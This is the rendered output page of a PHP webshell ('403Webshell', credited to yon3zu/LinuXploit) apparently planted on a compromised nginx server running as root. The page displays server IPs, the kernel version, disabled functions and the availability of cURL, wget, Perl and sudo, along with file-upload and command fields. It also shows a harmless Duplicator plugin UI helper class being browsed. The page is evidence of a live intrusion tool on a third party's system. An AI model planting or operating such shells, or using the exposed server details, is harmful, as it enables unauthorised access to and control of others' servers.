403Webshell
Server IP : 216.250.13.251  /  Your IP : 216.73.217.37
Web Server : nginx/1.24.0
System : Linux gunay 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : root ( 0)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/gunay/dup-installer/lib/snaplib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/gunay/dup-installer/lib/snaplib/class.snaplib.u.ui.php
<?php
/**
 *
 * Standard: PSR-2
 * @link http://www.php-fig.org/psr/psr-2
 *
 * @package DupLiteSnapLib
 * @copyright (c) 2017, Snapcreek LLC
 * @license	https://opensource.org/licenses/GPL-3.0 GNU Public License
 *
 */
defined('ABSPATH') || defined('DUPXABSPATH') || exit;

if (!class_exists('DupLiteSnapLibUIU', false)) {

    class DupLiteSnapLibUIU
    {

        public static function echoBoolean($val)
        {
            echo $val ? 'true' : 'false';
        }

        public static function echoChecked($val)
        {
            // filter_var is available in >= php 5.2
            if (function_exists('filter_var') && defined('FILTER_VALIDATE_BOOLEAN')) {
                echo filter_var($val, FILTER_VALIDATE_BOOLEAN) ? 'checked' : '';
            } else {
                echo $val ? 'checked' : '';
            }
        }

        public static function echoDisabled($val)
        {
            echo $val ? 'disabled' : '';
        }

        public static function echoSelected($val)
        {
            echo $val ? 'selected' : '';
        }

        public static function getSelected($val)
        {
            return ($val ? 'selected' : '');
        }
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit